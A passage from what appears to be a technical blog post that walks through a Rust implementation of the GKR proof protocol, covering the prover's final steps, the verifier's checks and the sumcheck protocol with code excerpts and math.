&lt;strong&gt;III)&lt;&#x2F;strong&gt; The GKR sumcheck allows us to &lt;strong&gt;work with both terms&lt;&#x2F;strong&gt; of $\tilde f_{ r_i } (b,c)$ at the same time.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;             let sumcheck_proof = gkr_sumcheck_prove(gkr_poly_terms, &amp;amp;mut transcript)?;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;             &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;       * **Sumcheck final claim:**  &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The prover samples a new field element $r^\star$ (called &lt;code&gt;r_new&lt;&#x2F;code&gt; in the code), evaluates the line $\ell$ at it, and calculates the composition polynomial $q$. The evaluation of $\ell$ is computed using the function &lt;code&gt;line()&lt;&#x2F;code&gt; that you can find in &lt;code&gt;lib.rs&lt;&#x2F;code&gt; (since it is used by both prover and verifier). The polynomial $q$, in turn, is calculated using the method &lt;code&gt;Prover::build_polynomial_q()&lt;&#x2F;code&gt;. To build it, the prover interpolates three points, since $q$ has degree 2 (as $\ell$ is linear and $\tilde W_{i + 1}$ is multilinear in each variable).&lt;&#x2F;p&gt;
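To see why three evaluations determine $q$, here is a minimal Lagrange-interpolation sketch over a toy prime field. The `eval_q` helper and the sample polynomial are illustrative assumptions, not the `Prover::build_polynomial_q()` implementation.

```rust
// Minimal sketch: a degree-2 polynomial q is pinned down by its values at
// x = 0, 1, 2, recovered here via Lagrange interpolation over the toy
// prime field F_97.
const P: u64 = 97;

// Modular inverse via Fermat's little theorem: a^(P-2) mod P.
fn inv(a: u64) -> u64 {
    let (mut base, mut exp, mut acc) = (a % P, P - 2, 1u64);
    while exp > 0 {
        if exp & 1 == 1 { acc = acc * base % P; }
        base = base * base % P;
        exp >>= 1;
    }
    acc
}

// Evaluate the interpolating polynomial through (0,y0), (1,y1), (2,y2) at x.
fn eval_q(y: [u64; 3], x: u64) -> u64 {
    let xs = [0u64, 1, 2];
    let mut acc = 0u64;
    for i in 0..3 {
        let mut term = y[i];
        for j in 0..3 {
            if i != j {
                let num = (x + P - xs[j]) % P;
                let den = (xs[i] + P - xs[j]) % P;
                term = term * num % P * inv(den) % P;
            }
        }
        acc = (acc + term) % P;
    }
    acc
}

fn main() {
    // q(x) = 3x^2 + 5x + 2: three evaluations determine it uniquely.
    let q = |x: u64| (3 * x * x + 5 * x + 2) % P;
    let y = [q(0), q(1), q(2)];
    for x in 0..10 {
        assert_eq!(eval_q(y, x), q(x));
    }
}
```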
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;             &#x2F;&#x2F; r* in our blog post &amp;lt;https:&#x2F;&#x2F;blog.lambdaclass.com&#x2F;gkr-protocol-a-step-by-step-example&#x2F;&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;             let r_new = transcript.sample_field_element();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;             &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;             &#x2F;&#x2F; Construct the next round&amp;#39;s random point using line function&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;             &#x2F;&#x2F;  l(x) = b + x * (c - b)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;             let (b, c) = sumcheck_challenges.split_at(num_vars_next);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;             &#x2F;&#x2F; r_i = l(r_new)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;             r_i = crate::line(b, c, &amp;amp;r_new);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;             &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;             let poly_q = Prover::build_polynomial_q(b, c, w_next_evals.clone())?;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;             &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    5. **Make the proof:** Finally, the prover has all the ingredients to make the proof.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;           &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;           let proof = GKRProof {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;               input_values: input.to_vec(),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;               output_values,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;               layer_proofs,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;           };&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h3 id=&quot;verifier&quot;&gt;Verifier&lt;&#x2F;h3&gt;
&lt;p&gt;Once we understand what the prover does, it’s easy to see what the verifier needs to do: she simply follows the same steps as the prover, using the elements of the proof and performing the necessary checks at each step. She verifies the proof using the method &lt;code&gt;Verifier::verify()&lt;&#x2F;code&gt;, following these steps:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. **Transcript Initialization:**  &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Just as the prover, start by creating a transcript and appending the &lt;strong&gt;circuit&lt;&#x2F;strong&gt; (which is known to both parties), the &lt;strong&gt;inputs&lt;&#x2F;strong&gt; , and the &lt;strong&gt;outputs&lt;&#x2F;strong&gt; sent in the proof by the prover.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. **Initial Sum Calculation:**  &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Sample field elements for $r_0$ to fix the variable $a$ and set the initial sum as $m_0 = \tilde D (r_0)$, where $\tilde D$ is the multilinear polynomial extension of the function that maps the output gates to the evaluation values. The prover sent these values as part of the proof.&lt;&#x2F;p&gt;
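The evaluation $\tilde D(r_0)$ can be sketched directly: a multilinear extension is a weighted sum of the table values, with Lagrange weights over the boolean hypercube. The toy field and the `mle_evaluate` helper below are assumptions for illustration, mirroring what `DenseMultilinearPolynomial::evaluate` computes in lambdaworks.

```rust
// Sketch of multilinear-extension evaluation over the toy field F_97:
// given the values of D on {0,1}^n, evaluate the unique multilinear
// extension D~ at an arbitrary point r, using the hypercube Lagrange basis
//   chi_x(r) = prod_k (r_k if x_k = 1 else 1 - r_k).
const P: u64 = 97;

fn mle_evaluate(evals: &[u64], r: &[u64]) -> u64 {
    let n = r.len();
    assert_eq!(evals.len(), 1 << n);
    let mut acc = 0u64;
    for (x, &v) in evals.iter().enumerate() {
        let mut chi = 1u64;
        for k in 0..n {
            let bit = (x >> k) & 1;
            let factor = if bit == 1 { r[k] } else { (1 + P - r[k]) % P };
            chi = chi * factor % P;
        }
        acc = (acc + v * chi) % P;
    }
    acc
}

fn main() {
    // Two variables, four output values.
    let outputs = [5u64, 9, 11, 20];
    // At hypercube points the extension agrees with the table...
    assert_eq!(mle_evaluate(&outputs, &[0, 0]), 5);
    assert_eq!(mle_evaluate(&outputs, &[1, 1]), 20);
    // ...and it is defined at any field point, e.g. r_0 = (3, 7),
    // which is how the verifier computes m_0 = D~(r_0).
    let m0 = mle_evaluate(&outputs, &[3, 7]);
    println!("m_0 = D~(r_0) = {m0}");
}
```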
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;           let output_poly_ext = DenseMultilinearPolynomial::new(proof.output_values.clone());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;           let mut claimed_sum = output_poly_ext&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;               .evaluate(r_i.clone())&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;               .map_err(|_e| VerifierError::MultilinearPolynomialEvaluationError)?;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;           &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. **Layer-by-Layer Verification:** For each layer $i$, the verifier performs the following:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;       * **Verify the sumcheck proof:**  &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The verifier checks the sumcheck proof for the current layer using the function &lt;code&gt;gkr_sumcheck_verify&lt;&#x2F;code&gt;. This function ensures that each univariate polynomial $g_j$ provided by the prover has degree at most 2 and is consistent with the claimed sum in each sumcheck round $j$; that is,&lt;br &#x2F;&gt;
$$\deg(g_j) \leq 2, \qquad g_j (0) + g_j (1) = g_{j - 1} (s_{ j - 1 }).$$&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;             let (sumcheck_verified, sumcheck_challenges) = gkr_sumcheck_verify(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                 claimed_sum.clone(),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                 &amp;amp;layer_proof.sumcheck_proof,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                 &amp;amp;mut transcript,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;             )?;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;             if !sumcheck_verified {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                 return Ok(false);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;             }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;             &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;       * **Check the final round $n$ using the composition polynomial $q$:**  &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;To verify the final claim of the sumcheck in the last round, the verifier needs the values $\tilde W_{ i + 1}(b^\star)$ and $\tilde W_{i + 1}(c^\star)$. However, the polynomial $\tilde W_{ i + 1}$ is unknown to her: the verifier doesn’t have the circuit evaluations. That is why she performs this final check using the composition polynomial $q$ provided by the prover. Recall that if the prover didn’t cheat, $q(0) = \tilde W_{ i + 1}(b^\star)$ and $q(1) = \tilde W_{ i + 1}(c^\star)$. Therefore, the verifier must check that&lt;br &#x2F;&gt;
$$g_n (s_n) = \widetilde{\text{add_i}} (r_i, b^\star, c^\star) \cdot (q(0) + q(1)) + \widetilde{\text{mul_i}} (r_i, b^\star, c^\star) \cdot (q(0) \cdot q(1))$$&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;             let last_poly = layer_proof.sumcheck_proof.round_polynomials.last().unwrap();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;             let last_challenge = sumcheck_challenges.last().unwrap();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;             let expected_final_eval = last_poly.evaluate::&amp;lt;F&amp;gt;(last_challenge);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;             &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;             let q_at_0 = layer_proof.poly_q.evaluate(&amp;amp;FieldElement::zero());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;             let q_at_1 = layer_proof.poly_q.evaluate(&amp;amp;FieldElement::one());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;             &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;             let add_eval = circuit.add_i_ext(&amp;amp;r_i, layer_idx).evaluate(sumcheck_challenges.clone())?;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;             let mul_eval = circuit.mul_i_ext(&amp;amp;r_i, layer_idx).evaluate(sumcheck_challenges.clone())?;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;             &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;             let final_eval = add_eval * (&amp;amp;q_at_0 + &amp;amp;q_at_1) + mul_eval * q_at_0 * q_at_1;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;             if final_eval != expected_final_eval {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                 return Ok(false);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;             }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;             &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;       * **Sample a new challenge and update the evaluation point:**  &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The verifier samples a new field element $r^\star$ from the transcript, then uses the line function to compute the next evaluation point $r_{ i + 1} = \ell (r^\star)$ for the following layer. The claimed sum is updated by evaluating the composition polynomial $q$ at the new challenge: $q(r^\star)$.&lt;&#x2F;p&gt;
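A minimal sketch of the line function, assuming componentwise arithmetic in a toy prime field (the real `line()` in `lib.rs` works over lambdaworks field elements):

```rust
// Sketch of the line through points b and c in F_97^n:
//   l(0) = b,  l(1) = c,  l(x) = b + x * (c - b)  (componentwise).
// The field and signatures are simplified for illustration.
const P: u64 = 97;

fn line(b: &[u64], c: &[u64], x: u64) -> Vec<u64> {
    b.iter()
        .zip(c.iter())
        .map(|(&bi, &ci)| (bi + (x % P) * ((ci + P - bi) % P)) % P)
        .collect()
}

fn main() {
    let b = vec![4u64, 15, 8];
    let c = vec![22u64, 3, 90];
    // The line restricts W~_{i+1} to a single variable: l(0) = b, l(1) = c,
    // and the next evaluation point is r_{i+1} = l(r*).
    assert_eq!(line(&b, &c, 0), b);
    assert_eq!(line(&b, &c, 1), c);
    let r_star = 29;
    println!("r_next = {:?}", line(&b, &c, r_star));
}
```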
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;             let r_new = transcript.sample_field_element();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;             let num_vars_next = circuit.num_vars_at(layer_idx + 1).ok_or(VerifierError::CircuitError)?;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;             let (b, c) = sumcheck_challenges.split_at(num_vars_next);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;             r_i = crate::line(b, c, &amp;amp;r_new);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;             claimed_sum = layer_proof.poly_q.evaluate(&amp;amp;r_new);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;             &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    4. **Final Input Check:**  &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;After all layers have been processed, the verifier checks that the final claimed sum matches the evaluation of the multilinear extension of the input values at the final evaluation point $r_i$. In the example from the previous post, that would be $$q(r^\star) = \tilde W_2 (r_2).$$ This ensures that the entire computation, from the outputs down to the inputs, is consistent.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;           let input_poly_ext = DenseMultilinearPolynomial::new(proof.input_values.clone());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;           if claimed_sum&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;               != input_poly_ext&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                   .evaluate(r_i)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                   .map_err(|_| VerifierError::MultilinearPolynomialEvaluationError)?&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;           {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;               return Ok(false);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;           }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;If all checks pass, the verifier accepts the proof as valid. Otherwise, the proof is rejected at the first failed check. This process allows the verifier to efficiently confirm the correctness of the computation without re-executing the entire circuit.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;the-sumcheck-protocol&quot;&gt;The Sumcheck Protocol&lt;&#x2F;h2&gt;
&lt;p&gt;The Sumcheck protocol is a central component of the GKR protocol. Its role is to allow the prover to convince the verifier that a sum over a product of multilinear polynomials is correct, without requiring the verifier to compute the sum directly. This is achieved by reducing the original sum to a sequence of univariate polynomial checks, one for each variable.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;quick-recap-what-is-the-sum-being-checked&quot;&gt;Quick Recap: What is the sum being checked?&lt;&#x2F;h3&gt;
&lt;p&gt;At each layer $i$ of the GKR protocol, the prover and verifier need to check a sum of the form:&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
S = \sum_{x_1, \ldots, x_n \in \{0,1\}} \tilde f_{ r_i }(x_1, \ldots, x_n)&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;where $\tilde f_{ r_i } (x_1, \ldots, x_n)$ is a multilinear polynomial that encodes the wiring and values of the circuit at that layer, and $n$ is the number of variables for that layer (which depends on the number of bits needed to index the gates of the next layer).&lt;&#x2F;p&gt;
&lt;p&gt;The sumcheck protocol allows the prover to convince the verifier that the claimed value $S$ is correct, by sending a sequence of univariate polynomials $g_1, g_2, \ldots, g_n$ such that, in round $j$:&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
g_j(z) = \sum_{x_{j + 1}, \ldots, x_n \in \{0,1\}} \tilde f_{ r_i } (s_1, \ldots, s_{j - 1}, z, x_{j + 1}, \ldots, x_n)&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;where $s_1, \ldots, s_{j - 1}$ are the challenges sampled in previous rounds, $z$ is the variable for the current round, and the remaining variables are summed over. The number of rounds (and thus the number of $g_j$ polynomials) is always equal to the number of variables of $\tilde f_{ r_i }$ for the layer being checked.&lt;&#x2F;p&gt;
&lt;p&gt;At each round, the verifier checks the key sumcheck property:&lt;&#x2F;p&gt;
&lt;p&gt;$$\deg(g_j) \leq 2$$&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
g_j(0) + g_j(1) = \text{previous sum}&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;and then samples a new challenge $s_j$ for the next round. After all rounds, the verifier is left with a claim about $\tilde f_{ r_i } (s_1, \ldots, s_n)$, which is checked against the next layer.&lt;&#x2F;p&gt;
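The round invariant above can be checked end to end on a tiny example. The sketch below runs a two-variable sumcheck with fixed toy challenges; the field, the polynomial, and all values are invented for illustration.

```rust
// A tiny two-variable sumcheck run over F_97: the prover's round polynomials
// g_1, g_2 satisfy the check the verifier performs each round,
//   g_j(0) + g_j(1) = g_{j-1}(s_{j-1})   (with the first check against S).
const P: u64 = 97;

// Multilinear f given by its table on {0,1}^2, evaluated at any field point.
fn f(evals: [u64; 4], x1: u64, x2: u64) -> u64 {
    let (nx1, nx2) = ((1 + P - x1) % P, (1 + P - x2) % P);
    (evals[0] * nx1 % P * nx2
        + evals[1] * x1 % P * nx2
        + evals[2] * nx1 % P * x2
        + evals[3] * x1 % P * x2) % P
}

fn main() {
    let evals = [3u64, 8, 2, 13]; // f(0,0), f(1,0), f(0,1), f(1,1)
    let s: u64 = evals.iter().sum::<u64>() % P; // claimed sum S = 26

    // Round 1: g_1(z) = f(z, 0) + f(z, 1).
    let g1 = |z: u64| (f(evals, z, 0) + f(evals, z, 1)) % P;
    assert_eq!((g1(0) + g1(1)) % P, s); // verifier's first check

    // Verifier samples s_1 (a fixed toy challenge here).
    let s1 = 42;

    // Round 2: g_2(z) = f(s_1, z).
    let g2 = |z: u64| f(evals, s1, z);
    assert_eq!((g2(0) + g2(1)) % P, g1(s1)); // round-to-round consistency

    // Final check: g_2(s_2) must equal f(s_1, s_2), a single query to f.
    let s2 = 77;
    assert_eq!(g2(s2), f(evals, s1, s2));
}
```

In GKR the final query to $\tilde f_{r_i}$ is exactly what the composition polynomial $q$ makes possible, since the verifier cannot evaluate $\tilde W_{i+1}$ herself.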
&lt;h3 id=&quot;splitting-the-gkr-polynomial-for-sumcheck&quot;&gt;Splitting the GKR Polynomial for Sumcheck&lt;&#x2F;h3&gt;
&lt;p&gt;The GKR polynomial $\tilde f_{ r_i } (b, c)$, which encodes the relationship between two adjacent layers, is given by:&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
\tilde f_{r_i}(b, c) = \widetilde{\text{add_i}} (r_i, b, c) \cdot \left( \widetilde W_{ i + 1} (b) + \widetilde W_{ i + 1} (c) \right) + \widetilde{\text{mul_i}} (r_i, b, c) \cdot \left( \widetilde W_{ i + 1 }(b) \cdot \widetilde W_{ i + 1}(c) \right)&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;To apply the sumcheck protocol, this polynomial is split into two terms, each being a product of two multilinear polynomials:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * The first term:  &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
\widetilde{\text{add_i}} (r_i, b, c) \cdot \left( \widetilde W_{ i + 1}(b) + \widetilde W_{ i + 1}(c) \right)&lt;br &#x2F;&gt;
$$
* The second term:&lt;br &#x2F;&gt;
$$&lt;br &#x2F;&gt;
\widetilde{\text{mul_i}} (r_i, b, c) \cdot \left( \widetilde W_{ i + 1 }(b) \cdot \widetilde W_{ i + 1}(c) \right)&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;This splitting is necessary because the sumcheck implementation expects a product of multilinear polynomials. In the code, this is handled by the function &lt;code&gt;Prover::build_gkr_polynomial&lt;&#x2F;code&gt; (see the Prover section), which returns a vector with two entries, each being a vector of two multilinear polynomials (the factors of each term). These are then passed to the sumcheck prover, which processes both terms together in each round.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;implementation-in-the-codebase&quot;&gt;Implementation in the Codebase&lt;&#x2F;h3&gt;
&lt;p&gt;The logic for the sumcheck protocol is implemented in &lt;code&gt;sumcheck.rs&lt;&#x2F;code&gt;. This file contains the functions used by both the prover and the verifier to perform the sumcheck rounds for each circuit layer.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;prover-step-by-step-sumcheck-proof-generation&quot;&gt;Prover: Step-by-step sumcheck proof generation:&lt;&#x2F;h4&gt;
&lt;p&gt;At each layer, the prover constructs the sumcheck proof as follows:&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;1. Build the GKR polynomial terms&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;For the current layer, construct the GKR polynomial and split it into two terms as required by the protocol:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let factors_term_1 = terms[0].clone();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let factors_term_2 = terms[1].clone();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let mut prover_term_1 = Prover::new(factors_term_1)?;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let mut prover_term_2 = Prover::new(factors_term_2)?;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;&lt;strong&gt;2. Compute the initial claimed sum&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
